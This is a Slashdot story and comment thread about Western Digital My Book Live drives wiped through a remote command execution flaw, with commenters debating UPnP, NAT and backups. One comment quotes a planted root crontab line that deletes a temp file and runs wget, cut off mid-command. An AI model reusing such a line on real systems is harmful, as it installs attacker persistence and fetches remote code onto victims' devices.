Become a fan of Slashdot on Facebook

 



Forgot your password?
typodupeerror
×
Data Storage

Western Digital Blames Remotely-Installed Trojans for Wiping 'My Book' Storage Devices (westerndigital.com) 103

Some users who bought an external hard drive that's delightfully shaped like a book ended up with "terabytes' worth of data, years of memories and months of hard work vanished in an instant," reports Engadget. (Though according to a new statement from Western Digital, "Some customers have reported that data recovery tools may be able to recover data from affected devices, and we are currently investigating the effectiveness of these tools.")

But why were these deletions from "My Books" happening in the first place? A Slashdot reader shares the first clue from Engadget's report: Several owners looked into the cause of the issue and determined that their devices were wiped after receiving a remote command for a factory reset. The commands starting going out at 3PM on Wednesday and lasted throughout the night. One user posted a copy of their log showing how a script was run to shut down their storage device for a factory restore.
Friday Western Digital's statement offered much more detail: Western Digital has determined that some My Book Live and My Book Live Duo devices are being compromised through exploitation of a remote command execution vulnerability... The log files we have reviewed show that the attackers directly connected to the affected My Book Live devices from a variety of IP addresses in different countries. This indicates that the affected devices were directly accessible from the Internet, either through direct connection or through port forwarding that was enabled either manually or automatically via UPnP.

Additionally, the log files show that on some devices, the attackers installed a trojan with a file named ".nttpd,1-ppc-be-t1-z", which is a Linux ELF binary compiled for the PowerPC architecture used by the My Book Live and Live Duo. A sample of this trojan has been captured for further analysis and it has been uploaded to VirusTotal.

Our investigation of this incident has not uncovered any evidence that Western Digital cloud services, firmware update servers, or customer credentials were compromised. As the My Book Live devices can be directly exposed to the internet through port forwarding, the attackers may be able to discover vulnerable devices through port scanning...

At this time, we recommend you disconnect your My Book Live and My Book Live Duo from the Internet to protect your data on the device by following these instructions on our Knowledge Base. We have heard customer concerns that the current My Cloud OS 5 and My Cloud Home series of devices may be affected. These devices use a newer security architecture and are not affected by the vulnerabilities used in this attack. We recommend that eligible My Cloud OS 3 users upgrade to OS 5 to continue to receive security updates for your device

This discussion has been archived. No new comments can be posted.

Western Digital Blames Remotely-Installed Trojans for Wiping 'My Book' Storage Devices

Comments Filter:
  • by Entrope ( 68843 ) on Sunday June 27, 2021 @12:38PM (#61526886) Homepage

    Yet again, the sales critters pitching convenience and additional functionality won out over basic security measures like "make sure you don't have remote code execution exploits". And yet again, consumers paid the price.

    • Yep, hard lesson to learn. Guess it's not so convinient now.
      • by Rosco P. Coltrane ( 209368 ) on Sunday June 27, 2021 @12:58PM (#61526964)

        Depends... You now have 1 terabyte of free space.

      • by Z00L00K ( 682162 )

        I can't help wondering if UPnP also is involved here to present the device to the internet.

        In my opinion UPnP is one of the worst ideas ever making it into devices for internet use.

        • If you read the summary it might give you an answer to tbat question.
        • Comment removed (Score:5, Insightful)

          by account_deleted ( 4530225 ) on Sunday June 27, 2021 @01:56PM (#61527126)
          Comment removed based on user account deletion
          • Re: (Score:2, Insightful)

            "NAT is an abomination" In all my years in IT I have not seen a NAT problem or issue I can recall. Not many things in IT that I can say that about. And I have seen many many issues and problems over the years. But maybe I was just lucky?
            • by Anonymous Coward
              guessing you haven't done much in IT then, I have a list as long as my arm I can remember, everything from VPN, games, voip etc etc. I would not call NAT an abomination but it has certainly had a problematic history (when it truth people implementing other tech that don't take NAT into account have caused a problematic history). even now CG-NAT is a fucking nightmare and is one of the first things many people need to disable with their provider.
              • by pnutjam ( 523990 )
                as long as you have access to the router, none of that is a problem. It's super easy to work around and UPnP is the abomination.
          • NAT is seen as a problem by purists but for most consumers it's probably better to live with it, since its effect is similar to a very basic firewall, than without it (which would mean every consumer device with a direct IP exposed to internet at large)

            • by Tool Man ( 9826 )

              NAT is the crappiest excuse for a firewall, but is still better than everything wide-open.

          • by Tool Man ( 9826 )

            If UPnP were to not exist, then yes, the vulnerabilities would still be there, but there would be fewer people affected.
            Defaults matter - having the feature present and even recommended to end users means that they just go, "I'll tick this box to make things work." And work, they do, even if they don't know why.

            Without UPnP or similar, it's harder to click one box that makes all sorts of things easily accessible from the outside. If risk = impact x likelihood, then the overall risk (to everyone) is still lo

        • In my opinion UPnP is one of the worst ideas ever making it into devices for internet use.

          What's going to happen when IPv4 is really supplanted by IPv6 and all those NAT routers go away, putting those billions (?) of IoT devices directly on the Internet?

          • by edis ( 266347 )

            You do NAT more for firewall/isolation, not so much because of the lack of the addresses. This way you have architecture with local tranquility and fine point of control what you are about to expose. It is utterly bad idea to take commodity device and put it on the Internet. Sooner or later you are into trouble. Only the bravest of devices can take the challenge of being exposed (with a slew of additional measures like dumping improper or undesired networks, acceptable peers, firewall rules, etc.).

            • I can get a /64 block assigned dynamically by my residential IP. If Comcast was not expecting users to take NAT out of the network, they would not assign 2**64 IP addresses on demand.

              • I can get a /64 block assigned dynamically by my residential IP. If Comcast was not expecting users to take NAT out of the network, they would not assign 2**64 IP addresses on demand.

                Your IPv6 capable router implements the exact same policy restricting unsolicited incoming requests for IPv6 it was previously enforcing for IPv4. The only thing that changes is the TLA from "NAT" to "SPI".

                SPI is **more** secure than NAT.

              • by Z00L00K ( 682162 )

                For home users that might be the case that NAT isn't needed, but for corporations then they may have their own IP address range and then NAT would be needed. Some corporations may get services from multiple ISPs.

                And even as a home user I don't like the idea of not having NAT, it would similar to replacing the opaque oak door to my home with a fully transparent glass door. The glass door might be stronger, but you will at the same time expose the stuff you have to a larger extent.

            • by Bert64 ( 520050 )

              No, NAT is *only* for the lack of addresses. If you're using it for any other purpose then you're doing it wrong.
              There is no reason you can't have a firewall with routable addresses on both sides. The firewall still controls what's exposed, but you do away with unnecessary complexity which provides many benefits:

              Different device - different address, your webserver can be on one address, email server on another address etc.
              Simplified logging , every device has its own address, no need to correlate multiple s

              • by edis ( 266347 )

                If you are setting LAN (Local Area Network), you are setting local area network. That's general definition by itself. Local network is commonly set behind NAT to start with the local security. That's what we typically set and keep here, YMMV.

          • What's going to happen when IPv4 is really supplanted by IPv6 and all those NAT routers go away, putting those billions (?) of IoT devices directly on the Internet?

            There will be more security because routers SPI is more secure than NAT packet mangling codes and associated ambiguous assumptions of ALGs.

          • by sjames ( 1099 )

            Implement a couple dead simple firewall rules that offer the same protection with practically none of the CPU overhead.

          • by Bert64 ( 520050 )

            Two things will happen:

            1) Absolutely nothing, most consumer oriented IPv6 routers block inbound connections by default and you can still use UPnP or similar to open things.
            2) A significant improvement - because even if a random insecure device is on the ipv6 internet with open accessible services, the address space is so vast that you're never going to locate it unless you already know where to look. A home user is typically going to have at least a /64 address space, most of which will be empty. Scanning a

            • 2) A significant improvement - because even if a random insecure device is on the ipv6 internet with open accessible services, the address space is so vast that you're never going to locate it unless you already know where to look

              That depends very much on how the IP addresses in that /64 are assigned. Some schemes may not be random, leading to a much smaller actual address space than is technically possible.

              • by Bert64 ( 520050 )

                That's assuming you are targeting a particular user and are even aware of their /64 (assuming the user doesn't have a /56), and are able to locate it within the /32 or larger belonging to the isp. you're not going to scan the whole internet looking for random vulnerable devices as its simply not practical to do so. Most of these devices being attacked are not targeted attacks against a particular individual, they are opportunistic attacks because ipv4 space is so small and makes it trivial to find any reach

    • by Anonymous Coward

      There are multiple levels of retarded fuckery at work here.

      (A) All the big computer companies sell computers with ridiculously small hard drives because it saves them money and allows them to advertise a lower price.

      (B) On many of these computers it is impossible to add an additional internal hard drive. I discovered this when I tried to add an SSD to my wife's Dell. Although the motherboard had 4 SATA connectors, the power supply only had one wire, with a "Y" split providing power to the hard drive and D

      • I hope you mean their whole power supply was using nonstandard molex connectors and nonstandard sata power plugs on the HD too, and somehow no splitters can be found on the internet. Because otherwise it would be awfully embarrassing for a /. poster to not know you can add all the Y splitters you want as long as the PS has enough wattage to handle the load (and hard drives don't need much), even if there's no standard molex connector assuming the HD uses a standard SATA power connection you can get a SATA p
        • by Anonymous Coward
          True nerds don't care what's available on the internet, they have their own crimping tools and can make their own cables.
      • It's actually pretty nice code, well laid out and easily understandable. They fscked it up with an RCE, but given the amount of code there (as shell script) that's not that unexpected. The real fsckup was having UPnP and remote access enabled by default.
    • by Ostracus ( 1354233 ) on Sunday June 27, 2021 @01:24PM (#61527024) Journal

      Where's the convenience in having a "factory restore" accessible via an Ethernet connection instead of hardwired to a physical button on the unit?

      • by Entrope ( 68843 )

        You could be in the middle of a fabulous all-inclusive cruise around the world when you get a notification that someone will break into your house the next day and steal all your bank account details. But never fear! Your data is all on your Internet-connected hard drive, accepting connections from more people than a Tindr aficionado, which means you can wipe it remotely as long as you avoid spilling your boat drink on your phone's screen!

        (Seriously, I can't imagine half of what these people must be think

        • by crunchygranola ( 1954152 ) on Sunday June 27, 2021 @02:35PM (#61527248)

          Let me try one - maybe a bit closer to a modern use case.

          You are running a crypto-currency based illegal marketplace and hear your remote motion sensor activate. Then, looking at the screens of your Ring Internet connected cameras you see FBI agents swarming into your warehouse "data center". Oh no~! But with hitting a single function key that triggers a script, you launch the reset command before they disconnect the drives.

          Darknet slave trader, this is the drive for you!

          • that's pretty good
          • Except the factory restore will only delete files, not fully erase the disk by overwriting it multiple times. So for this to work, said trader will still have to have a script which does that.

            Which means this factory reset functionality is only in the way, even then.

            • by AmiMoJo ( 196126 )

              The drives support encryption and factory reset destroys the key, making data unrecoverable.

              It's possible to recover data from non-encrypted drivers but a lot of customers made use of that feature it seems.

          • by edis ( 266347 )

            I doubt the device generally exposes this script for access. More likely device is designed for control by browser UI, Apps and such, where you would not find entry for the factory restore. Vulnerability, not a designed feature.

          • not a good example. In that scenario you want something that destroys the contents not simply resets the device which can then be recovered by authorities. far better off just using encrypted volumes with offline keys that require them to torture them out of you or better still a small explosive charge mounted to the top of the drive that can be triggered in an emergency.
          • by Bert64 ( 520050 )

            Or you use encryption, with the keys stored in memory and manually entered on boot. As soon as they disconnect the drives or power off the hosts the key is lost and you're not going to be giving it to them.

      • by shoor ( 33382 )

        Maybe it's cheaper to make a drive that does reset by ethernet than to include an actual, physical, manufactured button on the drive. The convenience is to the manufacturer not the customer.

    • by AmiMoJo ( 196126 ) on Sunday June 27, 2021 @01:26PM (#61527032) Homepage Journal

      What they didn't mention is that security researchers warned about this a few years ago, but WD said the products were out of support and wouldn't be fixed.

      • WD probably figured, a few might actually buy a new one because the old one is out of support.

        They knew the "few" could be a very small number, 90% of their customers might lose it all. Why take care of the non paying free loaders? A few sales are fresh revenue.

      • by ZorinLynx ( 31751 ) on Sunday June 27, 2021 @03:35PM (#61527434) Homepage

        On one hand, a company shouldn't expect to support a particular product forever.

        But on the other hand, WDC would have done better by releasing a final software update to the drives which would disable all communication with the Internet, putting them in "local only" mode so that customers can keep using the drives at home without any risk. If they're no longer supporting the cloud service that the drives use, there is no longer a reason for the drive to be chatting on the public Internet.

        • That's crazy, people would scream about a retroactive reduction in functionality of a device they paid for and own.
        • by AmiMoJo ( 196126 )

          Feature updates are one thing, but fixing critical security errors that allow a customer's data to be wiped is another. There should be no time limit on that, and at the very least when it was brought to their attention in 2018 they should have emailed customers to tell them to disconnect from the internet.

    • Yet again, the sales critters pitching convenience and additional functionality won out over basic security measures like "make sure you don't have remote code execution exploits". And yet again, consumers paid the price.

      Yet again we have an anti-consumer example from an expert telling them life is too hard. "Don't trust cloud services, roll your own from home." followed by "Don't roll your own, you expose yourself to the internet." No shit shirt lock, that's the point.

    • by sjames ( 1099 )

      Or even external connectivity to potentially sensitive data by default is a really bad idea.

    • You're assuming anyone even wants such "features" instead of "it's literally a backdoor directed from the top down." How many end users even know how to access such functionality?
  • ...they're wiping out all of John McAfee's secret files on the government. :-D

  • ... but this sounds to me as if someone shared a data drive on the internet actually thinking it was a good idea, maybe induced by some external influence like, e.g., braindead marketing bullshit. or did i miss something?

    • They probably did it for remote access not knowing how much internet traffic is constant vulnerability scans.

      • by Z00L00K ( 682162 )

        Or it was done automagically by the device itself using UPnP.

        • by dargaud ( 518470 )
          I have yet to ask WTF is UPnP and why would I ever want it ? I always disable it on my routers.
          • I have yet to ask WTF is UPnP and why would I ever want it ? I always disable it on my routers.

            Universal Pwn 'n Pillage?

          • It's to address the frustration of people who can't get online gaming to work and stuff like that because it requires configuring the firewall.
  • Analysis (Score:5, Insightful)

    by Rosco P. Coltrane ( 209368 ) on Sunday June 27, 2021 @12:52PM (#61526946)

    Our investigation of this incident has not uncovered any evidence that Western Digital cloud services, firmware update servers, or customer credentials were compromised.

    ...yet.

    My very short and very comprehensive analysis of the incident concludes that internet-facing IoT storage devices - and with a remote company having access to them to boot - are fucking retarded.

    • Indeed, everyone should just use the cloud... wait... didn't we say in the last story that users shouldn't trust the cloud with their data?

      It may come as a surprise to you that teaching teenagers abstinence doesn't actually reduce unwanted pregnancy. So how about we actually focus on giving people a real solution rather than saying everything everyone does is bad for some reason or another.

      • by edis ( 266347 )

        One employs real firewall for controlling exposures. Placing commodity unit on public net is no match.

        • I burn important stuff to DVDs and store them in a cupboard.

          I would love to have a higher density one, but 4 gig will do with a bit of care.

          • by edis ( 266347 )

            I had favorite CD media make for a while, but with a time the painted surface began peeling-off, cutting into my collection as a destructive physical wear. Also, other physical challenges can occur, so for really robust solution either duplicate location or online storage could do.

  • More internet of stupid devices not getting updated plus Windows 10's end of life with no upgrade path means a tide of data loss coming.
  • by fahrbot-bot ( 874524 ) on Sunday June 27, 2021 @01:03PM (#61526976)

    ... or through port forwarding that was enabled either manually or automatically via UPnP.

    Which is why I have UPnP disabled everywhere I can. If I want a frelling hole in my firewall, I'll configure it myself.

    • Which is why I have UPnP disabled everywhere I can. If I want a frelling hole in my firewall, I'll configure it myself.

      You sound like one of those IT people who knows what you're talking about. UPnP was created to solve a problem, one largely being that users can't be expected to be IT experts simply to get some online data access working. With the word "configure" you've automatically wiped out 99% of your customer base.

      • Which is why I have UPnP disabled everywhere I can. If I want a frelling hole in my firewall, I'll configure it myself.

        You sound like one of those IT people who knows what you're talking about. UPnP was created to solve a problem, one largely being that users can't be expected to be IT experts simply to get some online data access working. With the word "configure" you've automatically wiped out 99% of your customer base.

        What are you talking about? (a) I do know what I'm talking about (I'm a software engineer and system administrator) and (b) I'm talking about all my equipment at home. Automatically / quietly punching a hole in my home firewall isn't solving a problem for me, it's creating a potential problem -- as noted in TFS/A. Some people may be happy with software silently re-configuring their computers and networks -- and possibly making them less secure -- but I'm not.

        • UPnP was created to solve a problem, one largely being that users can't be expected to be IT experts simply to get some online data access working. With the word "configure" you've automatically wiped out 99% of your customer base.

          Maybe if WDs customers had to manually configure things to allow their drives/systems to be accessed from the Internet, they would have thought about it and declined. As it is, 99% of the customer base lost all their data. (Okay, maybe not that many, but I couldn't resist turning your phrase back on itself...) In this case UPnP created (or may have helped create) a problem rather solve one.

        • You sound like one of those IT people who knows what you're talking about. UPnP was created to solve a problem, one largely being that users can't be expected to be IT experts simply to get some online data access working. With the word "configure" you've automatically wiped out 99% of your customer base.

          What are you talking about? (a) I do know what I'm talking about (I'm a software engineer and system administrator) and (b) I'm talking about all my equipment at home. Automatically / quietly punching a hole in my home firewall isn't solving a problem for me, it's creating a potential problem -- as noted in TFS/A.

          Whoosh! First off, thegarbz acknowledged your expertise. Second, his point was that manufacturers introduce some vulnerabilities because the vast majority of their potential customers don't know how to configure their own networks and never will. Don't shoot the messenger - he's simply pointing out the facts of life.

      • by edis ( 266347 )

        Now you know the expense of that "convenience".

  • We need the equivalent of product safety laws to protect users. In the same way that we don't expect an average car owner to do a structural analysis of their car to know its safe in an impact, or that the brakes function with high reliability, we can't expect the average computer user to be able to evaluate the security of any device or software that they purchase.
  • by ptaff ( 165113 ) on Sunday June 27, 2021 @01:51PM (#61527108) Homepage

    years of memories and months of hard work vanished in an instant

    A remotely-wiped drive is no different to a suddenly crashing disk or to a stolen storage device. Those should be non-events. Where are your backups?

    • Where are your backups?

      On the bleeding MyBook that just got remotely wiped.

      • Where are your backups?

        On the bleeding MyBook that just got remotely wiped.

        If the loss of a MyBook drive cost you all your files, then the MyBook wasn't a backup - it was just a drive.

        • I actually used to backup one MyCloud to another with rsnapshot. Remote access was never enabled, nor were WD’s “cloud” features, and I believe one of the drives was on a separate VLAN without internet access, but it was a while ago. Not sure if this was a step up or a step down from offline backups for a home user, but it was something I thought was pretty solid. I recommended similar setups to friends who needed extra layer of backups for their one-person businesses. They used a secondar

    • by edis ( 266347 )

      Not when it is scheduled en masse at 3PM.

  • and instead blame a company that took more than 2 years to patch a CSV, and only did so after a well publicized clusterfsck like this.

  • The following was posted by Linuxcpa [wd.com] on the WD community forum. The hackers were apparently out for destruction and not ransom:

    After one of my 4 western digital drives were factory reset, i decided to look for suspicious crontab entries.

    I found this in /etc/crontab, ip numbers removed and replaced with xxx. Also, i had to alter the normal http colon // because im a “new user” limited to two links. (I have no intent in posting links) Two ip numbers were utilized.

    1 * * * * root rm -f /tmp/w;wget -

    • So, clearly that was the LAST step that was taken.
      Prior to the wipe we don't know what they were running/storing/forwarding via that device.
      There could have been some serious illegal stuff happening there.
      Only evidence left behind was the remote reset script that is not on those WD devices.
      The average plugNplay user wouldn't even think to look at another device for such evidence.

    • One ip number points to Russia, the other Latvia.

      So the CIA, then.

      "One feature in Marble stands out. It creates a means for virus writers to pretend that the malware was created by a speaker of a range of foreign languages (Chinese, Russian, Korean, Arabic and Farsi). These are, of course, the languages of the US's main cyber-adversaries – China, Russia, North Korea and (historically, at least) Iran".

      https://www.theregister.com/20... [theregister.com]

    • by edis ( 266347 ) on Sunday June 27, 2021 @04:49PM (#61527644) Journal

      If you are curious, Latvia has high number of Russian population since being incorporated into their empire, even if now Latvia has parted their ways. Thus, there is particular common denominator. Frequenting lately.

  • Seriously, I don't think that people who are incompetent enough to unknowingly leave their hard disks connected to the Internet can have anything valuable on them.

    • The hard drive on the device you just typed that from is also connected to the internet. It will store things at the behest of stranger out on the internet in a controlled way, like writing cookies to disk. It is of course supposed to be blocked from processing arbitrary commands from malicious actors on the internet. Just like these drives.
  • No one is did a validity check on the final version they pushed out to those drives. When I do downloads I check them against published hashes and it looks like the automated distribution system didn't do that with original hashes made before the code was compromised.
    It's horrifying to think WD didn't think they needed quadruple scrutiny over software pushes like this. Unlike a compromised router or other gadget, this was essentially a ransomware attack on their customers data for which there was no price

  • Owner's of some IoT-connected refrigerators have reported waking up to empty fridges. Apparently, hackers been able to exploit a "remote consumption vulnerability" in the firmware to devour large quantities of leftover pizza, ice cream, soft drinks, etc. While some people have expressed dismay at losing their delectables, others reported delight that items such as "a month-old container of moldy spaghetti" were gone. However, there is one report that "a perfectly good, half full can of sardines" was left

  • That's when these IOT toys got their last firmware update

    SO Joe Sixpack has all his valuable files on 2010 era drive, visible to the internet and its firmware is 6 years out of date

    Shocker

  • This is sad that some low-life thinks that it is cool or funny to destroy. Oh. I forgot that is the heart of the Broken Woken. But also blame has to be shared with people who place all of their data onto a single drive without proper backup. You should always have no less than three (3) copies of you data. Why three? First, before that number explained. If you don't test your backups how do you know if anything on your backup is good? I use Beyond Compare to do bit comparisons on my 4TB of data every few
  • So I see the appeal of these... simple little low-power box that can make files available to you and your family wherever you are. It's too bad they didn't try to sell second devices as non-internet-connected backups too.

    But with something like this being handy (I have an old USB-only hooked up to a laptop as a file-sharing device), is there an active hacker community making alternative firmwares for these? Something like OpenWRT for routers?

  • In the beginning there were portable HDs. Then someone pointed out that by adding a SoC and a NI, the HD could be easily shared with every computer on the LAN. And the users were happy. The professional-amateurs were able to connect remotely, using firewalls and SSH forwarding. And then amateurs tried, and failed, and were unhappy. So they cried unto WD, "Make remote access easy!" But engineers warned: "If we do this, it will make the device vulnerable." So WD management decided to provide cloud a

  • I lost several years worth of photos off a MyBook.
    Turns out that WD uses a hidden sector for bootcode and data and that sector can get corrupted.
    WD told me there was no way to get the data back because the sector holds track data - something to do with the JBOD striping algorithm.
    I've still got the drives and nobody wants to tackle the data recovery.

  • 1. Thank you for buying our general purpose computing device, based upon well-known source code.
    2. The device's very design suggests you should make it available over the internet to obtain fullest use of its functionality.
    3. Oh! And while it is a general purpose computing device, your method of use will not endow it with the sort of patching and regular updates that your desktop machines and servers enjoy.

A committee takes root and grows, it flowers, wilts and dies, scattering the seed from which other committees will bloom. -- Parkinson

Working...